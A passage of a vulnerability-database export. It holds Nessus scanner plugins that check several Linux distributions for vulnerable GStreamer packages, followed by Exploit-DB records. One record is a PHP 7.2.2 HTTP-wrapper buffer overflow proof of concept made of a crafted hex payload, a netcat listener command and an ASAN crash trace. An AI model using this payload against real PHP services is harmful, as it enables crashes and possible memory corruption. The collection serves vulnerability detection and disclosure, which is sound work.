(CVE-2016-9445)\n\n* Multiple flaws were discovered in GStreamer's H.264 and MPEG-TS\nplug-ins. A remote attacker could use these flaws to cause an\napplication using GStreamer to crash. (CVE-2016-9809, CVE-2016-9812,\nCVE-2016-9813)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0021.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef94c266\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0021\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6.vl7\",\n \"gstreamer1-plugins-bad-free-devel-1.4.5-6.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:33", "bulletinFamily": "scanner", "description": "According to the versions of the gstreamer1-plugins-bad-free package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based buffer overflow, was found in GStreamer's VMware VMnc video file format decoding plug-in. A remote attacker could use this flaw to cause an application using GStreamer to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and MPEG-TS plug-ins. A remote attacker could use these flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2017-1007.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99853", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99853);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ff6a7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \" gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:30:33", "bulletinFamily": "scanner", "description": "According to the versions of the gstreamer1-plugins-bad-free package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based buffer overflow, was found in GStreamer's VMware VMnc video file format decoding plug-in. A remote attacker could use this flaw to cause an application using GStreamer to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and MPEG-TS plug-ins. A remote attacker could use these flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-14T00:00:00", "id": "EULEROS_SA-2017-1008.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99854", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99854);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74dd7c95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:50", "bulletinFamily": "scanner", "description": "Hanno Boeck discovered multiple vulnerabilities in the GStreamer media framework and its codecs and demuxers, which may result in denial of service or the execution of arbitrary code if a malformed media file is opened.", "modified": "2018-11-10T00:00:00", "id": "DEBIAN_DSA-3818.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=99004", "published": "2017-03-28T00:00:00", "title": "Debian DSA-3818-1 : gst-plugins-bad1.0 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3818. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99004);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:38\");\n\n script_cve_id(\"CVE-2016-9809\", \"CVE-2016-9812\", \"CVE-2016-9813\", \"CVE-2017-5843\", \"CVE-2017-5848\");\n script_xref(name:\"DSA\", value:\"3818\");\n\n script_name(english:\"Debian DSA-3818-1 : gst-plugins-bad1.0 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Boeck discovered multiple vulnerabilities in the GStreamer media\nframework and its codecs and demuxers, which may result in denial of\nservice or the execution of arbitrary code if a malformed media file\nis opened.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/gst-plugins-bad1.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3818\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gst-plugins-bad1.0 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 1.4.4-2.1+deb8u2.\n\nFor the upcoming stable distribution (stretch), these problems have\nbeen fixed in version 1.10.4-1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gst-plugins-bad1.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"gstreamer1.0-plugins-bad\", reference:\"1.4.4-2.1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gstreamer1.0-plugins-bad-dbg\", reference:\"1.4.4-2.1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"gstreamer1.0-plugins-bad-doc\", reference:\"1.4.4-2.1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgstreamer-plugins-bad1.0-0\", reference:\"1.4.4-2.1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgstreamer-plugins-bad1.0-dev\", reference:\"1.4.4-2.1+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2018-06-06T12:20:24", "bulletinFamily": "exploit", "description": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow. CVE-2018-7584. Dos exploit for PHP platform", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "EDB-ID:44846", "href": "https://www.exploit-db.com/exploits/44846/", "type": "exploitdb", "title": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n\r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n\r\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\r\n\t\t\t\t--tmp_line_len;\r\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\r\n\t\t\t\t\t--tmp_line_len;\r\n\t\t\t\t}\r\n}\r\n\r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n\r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n\r\n\r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n\r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n\r\nExpected result:\r\n----------------\r\nNO CRASH\r\n\r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44846/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path 